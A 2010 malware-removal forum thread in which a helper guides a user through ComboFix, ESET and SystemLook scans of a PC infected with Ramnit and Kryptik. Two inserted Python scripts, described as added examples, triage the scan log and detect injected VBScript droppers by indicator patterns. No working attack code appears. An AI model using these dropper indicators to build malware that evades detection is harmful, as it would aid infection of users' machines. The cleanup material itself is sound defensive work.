"COMODO Internet Security"="e:\program files\COMODO\COMODO Internet Security\cfp.exe" [2010-06-01 2039240]
"Adobe Reader Speed Launcher"="e:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2010-06-20 35760]
"Adobe ARM"="e:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-06-09 976832]
"Advanced System Protector"="e:\program files\Systweak\Advanced System Protector\ASP.exe" [2009-11-03 16347368]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="e:\windows\system32\CTFMON.EXE" [2004-08-04 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21 548352 ----a-w- e:\program files\SUPERAntiSpyware\SASWINLO.DLL

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=e:\windows\system32\guard32.dll

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ autocheck autochk *\0sasnative32

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Acrobat Speed Launcher.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Acrobat Speed Launcher.lnk
backup=e:\windows\pss\Adobe Acrobat Speed Launcher.lnkCommon Startup

[HKLM\~\startupfolder\E:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Gamma.lnk]
path=e:\documents and settings\All Users\Start Menu\Programs\Startup\Adobe Gamma.lnk
backup=e:\windows\pss\Adobe Gamma.lnkCommon Startup

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KernelFaultCheck]
e:\windows\system32\dumprep 0 -k [X]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Advanced System Protector]
2009-11-03 18:35 16347368 ----a-w- e:\program files\Systweak\Advanced System Protector\ASP.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AutoStartNPSAgent]
2009-08-14 14:48 106904 ----a-w- e:\program files\Samsung\Samsung New PC Studio\NPSAgent.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Broadcom Wireless Manager UI]
2006-11-01 12:48 1392640 ----a-w- e:\windows\system32\WLTRAY.EXE

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON.EXE]
2004-08-04 10:00 15360 ----a-w- e:\windows\system32\ctfmon.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxhkcmd]
2006-06-06 17:06 77824 ----a-w- e:\windows\system32\hkcmd.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxpers]
2006-06-06 17:10 118784 ----a-w- e:\windows\system32\igfxpers.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\igfxtray]
2006-06-06 17:09 94208 ----a-w- e:\windows\system32\igfxtray.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2010-01-22 19:16 141608 ----a-w- e:\program files\iTunes\iTunesHelper.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Malwarebytes Anti-Malware (rootkit-scan)]
2010-04-29 14:39 1090952 ----a-w- e:\program files\Malwarebytes' Anti-Malware\mbam.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\MSMSGS]
2004-08-04 01:06 1667584 ----a-w- e:\program files\Messenger\msmsgs.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SDFix]
2008-11-05 23:58 964661 ----a-w- e:\sdfix\RunThis.bat

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SigmatelSysTrayApp]
2007-05-10 10:22 405504 ----a-w- e:\program files\SigmaTel\C-Major Audio\WDM\stsystra.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SUPERAntiSpyware]
2010-05-18 17:26 2397424 ----a-w- e:\program files\SUPERAntiSpyware\SUPERAntiSpyware.exe

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
2006-03-08 12:48 761947 ----a-w- e:\program files\Synaptics\SynTP\SynTPEnh.exe

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run-]
"ISTray"="e:\program files\Spyware Doctor\pctsTray.exe"

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"e:\\Program Files\\Opera\\opera.exe"=
"e:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"e:\\Program Files\\iTunes\\iTunes.exe"=
"e:\\Program Files\\uTorrent\\uTorrent.exe"=
"e:\\Program Files\\Veoh Networks\\VeohWebPlayer\\veohwebplayer.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsasvr.exe"=
"e:\\Program Files\\Samsung\\Samsung New PC Studio\\npsvsvr.exe"=

R0 PCTCore;PCTools KDS;e:\windows\system32\drivers\PCTCore.sys [29/07/2010 10:10 218592]
R1 cmdGuard;COMODO Internet Security Sandbox Driver;e:\windows\system32\drivers\cmdGuard.sys [04/06/2010 11:55 229312]
R1 cmdHlp;COMODO Internet Security Helper Driver;e:\windows\system32\drivers\cmdhlp.sys [01/06/2010 19:00 25240]
R1 SASDIFSV;SASDIFSV;e:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 19:25 12872]
R1 SASKUTIL;SASKUTIL;e:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 19:41 67656]
R2 a2free;a-squared Free Service;e:\program files\a-squared Free\a2service.exe [13/06/2010 17:14 1872320]
R2 FsUsbExService;FsUsbExService;e:\windows\system32\FsUsbExService.Exe [20/04/2010 11:18 237984]
R3 BCASPROT;Advanced System Protector;e:\program files\Systweak\Advanced System Protector\sasprot32.sys [15/06/2010 13:39 6656]
R3 FsUsbExDisk;FsUsbExDisk;e:\windows\system32\FsUsbExDisk.Sys [20/04/2010 11:18 36608]
S2 wscsvcSpooler;Security Center wscsvcSpooler;e:\windows\system32\adsldpca.exe srv --> e:\windows\system32\adsldpca.exe srv [?]
S3 MEMSWEEP2;MEMSWEEP2;\??\e:\windows\system32\8C.tmp --> e:\windows\system32\8C.tmp [?]
S3 s1018bus;Sony Ericsson Device 1018 driver (WDM);e:\windows\system32\drivers\s1018bus.sys [01/04/2010 18:33 86824]
S3 s1018mdfl;Sony Ericsson Device 1018 USB WMC Modem Filter;e:\windows\system32\drivers\s1018mdfl.sys [02/04/2010 11:00 15016]
S3 s1018mdm;Sony Ericsson Device 1018 USB WMC Modem Driver;e:\windows\system32\drivers\s1018mdm.sys [02/04/2010 11:00 114728]
S3 s1018mgmt;Sony Ericsson Device 1018 USB WMC Device Management Drivers (WDM);e:\windows\system32\drivers\s1018mgmt.sys [02/04/2010 11:00 106208]
S3 s1018nd5;Sony Ericsson Device 1018 USB Ethernet Emulation (NDIS);e:\windows\system32\drivers\s1018nd5.sys [01/04/2010 18:33 26024]
S3 s1018obex;Sony Ericsson Device 1018 USB WMC OBEX Interface;e:\windows\system32\drivers\s1018obex.sys [02/04/2010 11:00 104744]
S3 s1018unic;Sony Ericsson Device 1018 USB Ethernet Emulation (WDM);e:\windows\system32\drivers\s1018unic.sys [01/04/2010 18:33 109864]
S4 sptd;sptd;e:\windows\system32\drivers\sptd.sys [02/02/2010 01:58 691696]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
bdx REG_MULTI_SZ scan
.
.
------- Supplementary Scan -------
.
IE: Convert link target to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert to existing PDF - e:\program files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
FF - ProfilePath - e:\documents and settings\Mike\Application Data\Mozilla\Firefox\Profiles\99m84v2t.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.google.co.uk/
FF - HiddenExtension: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - e:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\

---- FIREFOX POLICIES ----
FF - user.js: network.cookie.cookieBehavior - 0
FF - user.js: privacy.clearOnShutdown.cookies - false
FF - user.js: security.warn_viewing_mixed - false
FF - user.js: security.warn_viewing_mixed.show_once - false
FF - user.js: security.warn_submit_insecure - false
FF - user.js: security.warn_submit_insecure.show_once - false
e:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.lu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nu", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.nz", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbaam7a8h", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgberp4a5d4ar", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--p1ai", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.xn--mgbayh7gpa", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.IDN.whitelist.tel", true);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.proxy.type", 5);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.count", 24);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("network.buffer.cache.size", 4096);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("dom.ipc.plugins.timeoutSecs", 45);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
e:\program files\Mozilla Firefox\greprefs\all.js - pref("accelerometer.enabled", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.allow_unrestricted_renego_everywhere__temporarily_available_pref", true);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.renego_unrestricted_hosts", "");
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
e:\program files\Mozilla Firefox\greprefs\security-prefs.js - pref("security.ssl.require_safe_negotiation", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.nptest.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npswf32.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npctrl.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled.npqtplugin.dll", true);
e:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("dom.ipc.plugins.enabled", false);
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-08-08 01:18
Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet005\Services\MEMSWEEP2]
"ImagePath"="\??\e:\windows\system32\8C.tmp"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'winlogon.exe'(568)
e:\program files\SUPERAntiSpyware\SASWINLO.DLL
e:\windows\system32\WININET.dll
e:\windows\System32\BCMLogon.dll

- - - - - - - > 'explorer.exe'(3960)
e:\windows\system32\WININET.dll
e:\windows\system32\IEFRAME.dll
e:\windows\system32\msi.dll
e:\windows\system32\mshtml.dll
e:\windows\system32\WPDShServiceObj.dll
e:\windows\system32\PortableDeviceTypes.dll
e:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
e:\program files\COMODO\COMODO Internet Security\cmdagent.exe
e:\windows\System32\WLTRYSVC.EXE
e:\windows\System32\bcmwltry.exe
e:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
e:\program files\Bonjour\mDNSResponder.exe
e:\windows\system32\msiexec.exe
e:\windows\system32\wscntfy.exe
.
**************************************************************************
.
Completion time: 2010-08-08 01:23:11 - machine was rebooted
ComboFix-quarantined-files.txt 2010-08-08 00:23
ComboFix2.txt 2010-08-07 22:51
ComboFix3.txt 2010-07-26 13:37

Pre-Run: 32,682,283,008 bytes free
Post-Run: 33,202,368,512 bytes free

Current=5 Default=5 Failed=3 LastKnownGood=6 Sets=1,2,3,4,5,6
- - End Of File - - 039C1780E070F48A68B811B8F2E4C1DE


One other odd behaviour I forgot to mention: every time I click on a folder icon or use Windows Explorer, the Windows Installer for Acrobat 7 starts up.

Cheers

Mike


#9 m0le
Malware Response Team, 34,527 posts, Location: London, UK

Posted 07 August 2010 - 08:03 PM

Please run the online scan at ESET so we can make sure we've got everything.
  1. Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  2. Click the button.
  3. For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    1. Click on to download the ESET Smart Installer. Save it to your desktop.
    2. Double click on the icon on your desktop.
  4. Check
  5. Click the button.
  6. Accept any security warnings from your browser.
  7. Leave the top box checked and then check
  8. Push the Start button.
  9. ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  10. When the scan completes, push
  11. Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  12. Push the button.
  13. Push
NOTE: If no malware is found then no log will be produced. Let me know if this is the case.
m0le is a proud member of UNITE

#10 mikethecow (Topic Starter)
Members, 28 posts

Posted 08 August 2010 - 03:33 AM

Hi M0le

Sorry, I passed out last night.

Here is the woeful ESET log
QUOTE
E:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll Win32/Ramnit.A virus cleaned - quarantined
E:\Program Files\Microsoft\DesktopLayer.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\Program Files\Movie Maker\moviemk.exe Win32/Ramnit.A virus cleaned - quarantined
E:\Program Files\Outlook Express\msoe.dll Win32/Ramnit.A virus cleaned - quarantined
E:\Qoobox\Quarantine\E\Program Files\Microsoft\DesktopLayer.exe.vir a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057922.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057923.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0057924.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058047.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058063.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058823.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058836.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0058896.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP23\A0059821.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060939.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060940.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060941.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060977.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0060983.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062009.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062053.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP24\A0062054.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP25\A0063091.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064140.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064166.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0064182.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP26\A0065193.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065264.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065415.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065417.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065542.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065617.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065648.dll Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065649.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065650.exe Win32/Ramnit.A virus cleaned - quarantined
E:\System Volume Information\_restore{2340E044-47FD-4602-BDF3-0CBCA4583939}\RP28\A0065653.dll Win32/Ramnit.A virus cleaned - quarantined
E:\WINDOWS\ExplorerSrv.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined


Thanks M0le

Mike


#11 m0le
Malware Response Team, 34,527 posts, Location: London, UK

Posted 08 August 2010 - 04:03 AM

ESET doesn't tell the whole story. You can ignore the Qoobox and System Restore entries.

The others are just the beginnings of the infection being removed. It's the usual final step in most fixes.

How is the PC running now? Still getting the file injection?
m0le is a proud member of UNITE
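A small triage script for an ESET Online Scanner log, written here as an added example (it is not a tool from this thread or from ESET): it sets aside the Qoobox and System Volume Information hits as the reply above suggests and lists only the live files, grouped by malware family. The log lines embedded in it are constructed in the same format as the log posted above; the paths and the restore-point GUID are placeholders, not values from the real scan.

```python
"""Triage an ESET log: skip hits under Qoobox (ComboFix quarantine) and
System Volume Information (System Restore points), which are copies of
files already removed, and list the live files that carried the infection."""
import re
from collections import defaultdict

# One ESET line reads: <path> <detection> <action> - quarantined
# The detection begins with "Win32/" or with "a variant of ".
_DETECTION_START = re.compile(r" (?=Win32/|a variant of )")
_FAMILY = re.compile(r"Win32/[\w.]+")
# Folder names that hold copies rather than active files.
_ECHO_MARKERS = ("\\qoobox\\", "\\system volume information\\")


def parse_line(line):
    """Return (path, family, action) for one log line, or None if unparsable."""
    parts = _DETECTION_START.split(line.strip(), maxsplit=1)
    if len(parts) != 2:
        return None
    path, rest = parts
    m = _FAMILY.search(rest)
    if not m:
        return None
    action = rest[m.end():].split(" - ")[0].strip()   # e.g. "virus cleaned"
    return path, m.group(0), action


def is_echo(path):
    """True for quarantine and restore-point copies that can be ignored."""
    p = path.lower()
    return any(marker in p for marker in _ECHO_MARKERS)


def triage(log_text):
    """Return ({family: [live paths]}, number of echo entries skipped)."""
    live = defaultdict(list)
    echoes = 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, family, _ = rec
        if is_echo(path):
            echoes += 1
        else:
            live[family].append(path)
    return dict(live), echoes


# Constructed sample lines in the ESET format used in the thread; the paths
# and the restore-point GUID are placeholders, not values from the real log.
SAMPLE_LOG = r"""
E:\Program Files\ExampleApp\helper.dll Win32/Ramnit.A virus cleaned - quarantined
E:\Qoobox\Quarantine\E\Program Files\ExampleApp\Layer.exe.vir a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
E:\System Volume Information\_restore{PLACEHOLDER-GUID}\RP1\A0000001.exe Win32/Ramnit.A virus cleaned - quarantined
E:\WINDOWS\ExampleSrv.exe a variant of Win32/Kryptik.FSD trojan cleaned by deleting - quarantined
"""

if __name__ == "__main__":
    live, echoes = triage(SAMPLE_LOG)
    print(f"{echoes} quarantine/restore-point echoes ignored")
    for family, paths in sorted(live.items()):
        print(family, *paths, sep="\n    ")
```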

#12 mikethecow (Topic Starter)
Members, 28 posts

Posted 08 August 2010 - 05:01 AM

Hi M0le

Deleted all the VB script out of html & htm files and restarted several times.

So far so good - hasn't reappeared, nor has 'desktoplayer' or 'explorerSRv.exe'!

Still getting the annoying Windows Installer for Acrobat 7 appearing when I open folders - if you can shed any light on that it would be brilliant.

Do you ever sleep, by the way?

Mike
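Mike stripped the injected VBScript from his HTML files by hand; the script below is an added example (not a tool from this thread) that automates the same check: it walks local .htm/.html files, flags a VBScript block only when it shows the dropper's three tell-tales, removes it and keeps the original beside it. The indicator patterns, the .infected suffix and the sample page are assumptions of this example, and the sample block is an inert stand-in that carries the indicators but does nothing.

```python
"""Locate and strip the VBScript dropper block appended to local .htm/.html
files. Heuristic (this example's assumption): a <script language=vbscript>
block counts as the injected dropper only when it creates both
Scripting.FileSystemObject and WScript.Shell and carries a long hex string
starting with 4D5A, the "MZ" header of a Windows executable."""
import re
from pathlib import Path

_VBS_BLOCK = re.compile(
    r"<script[^>]*language\s*=\s*['\"]?vbscript['\"]?[^>]*>.*?</script>",
    re.IGNORECASE | re.DOTALL,
)
_INDICATORS = (
    re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"', re.I),
    re.compile(r'CreateObject\(\s*"WScript\.Shell"', re.I),
    re.compile(r'"4D5A[0-9A-F]{4,}', re.I),   # executable image embedded as hex
)


def find_dropper_blocks(html):
    """Return each VBScript block in html that shows all three indicators."""
    return [m.group(0) for m in _VBS_BLOCK.finditer(html)
            if all(ind.search(m.group(0)) for ind in _INDICATORS)]


def clean_html(html):
    """Return (html with dropper blocks removed, number of blocks removed)."""
    blocks = find_dropper_blocks(html)
    for block in blocks:
        html = html.replace(block, "")
    return html, len(blocks)


def clean_tree(root):
    """Clean every .htm/.html file under root in place; return cleaned paths.
    The original is kept beside each cleaned file with a .infected suffix."""
    cleaned = []
    for path in Path(root).rglob("*"):
        if path.suffix.lower() not in (".htm", ".html"):
            continue
        # latin-1 maps every byte to one code point, so the round trip
        # leaves untouched bytes exactly as they were.
        text = path.read_text(encoding="latin-1")
        new_text, n = clean_html(text)
        if n:
            path.with_suffix(path.suffix + ".infected").write_bytes(path.read_bytes())
            path.write_text(new_text, encoding="latin-1")
            cleaned.append(str(path))
    return cleaned


# Constructed sample: a harmless page with an inert stand-in for the appended
# block (it carries the indicators but has no write loop and no Run call).
SAMPLE_PAGE = """<html><body><p>Holiday photos</p></body></html>
<script Language=VBScript><!--
' constructed stand-in, not a working dropper
WriteData = "4D5A90000300"
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSHshell = CreateObject("WScript.Shell")
//--></SCRIPT>"""

if __name__ == "__main__":
    cleaned, removed = clean_html(SAMPLE_PAGE)
    print(f"removed {removed} block(s); cleaned page:\n{cleaned}")
```

Run `clean_tree("E:\\")` (or whichever drive holds the HTML files) to process a whole tree; each cleaned file leaves an `.infected` copy behind for later inspection.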

#13 m0le
Malware Response Team, 34,527 posts, Location: London, UK

Posted 08 August 2010 - 05:12 AM

I do sleep...it's an option anyway

This is a problem with where Adobe places its folder when it installs on your computer. We can try and find this using SystemLook.

Please download SystemLook from one of the links below and save it to your Desktop.
Download Mirror #1
Download Mirror #2
  • Double-click SystemLook.exe to run it.
  • Copy the content of the following codebox into the main textfield:
    CODE
    :reg
    hkey_local_machine\software\classes\installer\products
    :filefind
    acropro.msi

  • Click the Look button to start the scan.
  • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
Note: The log can also be found on your Desktop entitled SystemLook.txt
m0le is a proud member of UNITE

#14 mikethecow (Topic Starter)
Members, 28 posts

Posted 08 August 2010 - 05:31 AM

System Look log


QUOTE
SystemLook v1.0 by jpshortstuff (11.01.10)
Log created at 11:23 on 08/08/2010 by Mike (Administrator - Elevation successful)

========== reg ==========

[HKEY_LOCAL_MACHINE\software\classes\installer\products]
(No values found)

[HKEY_LOCAL_MACHINE\software\classes\installer\products\01E4D47B330100000000000000000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\08E8456490400000E7A85400F0580510]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\0CB8AE65157339B4CBD96615CC635EAA]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\0DC1503A46F231838AD88BCDDC8E8F7C]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\26DDC2EC4210AC63483DF9D4FCC5B59D]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\283F4817C6A858B43ACA6B73431B2E14]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\32178270CA8BEC143864D37727543CB5]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3618C4F7952F0A940A8182759A5087CB]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3C69C2D13F3A7E948B935972D9DE38F7]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\3e43b73803c7c394f8a6b2f0402e19c2]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\427995CA55751C84BA7EBA8B75569203]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\4BB1B6CC60E4B5A41A663B175B1523B4]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\4C7BB6329144DF244090E152A7523ED4]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\58F0D9C98565E5A4599A567FBD9261EE]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\5B30E9DFAEEA95D45B21C64EAA20184D]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\68AB67CA330100007706000000000020]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\68AB67CA7DA73301B7449A0300000010]

[HKEY_LOCAL_MACHINE\software\classes\installer\products\6D5E4E6D39674BB459AB123FF8FAEE09]

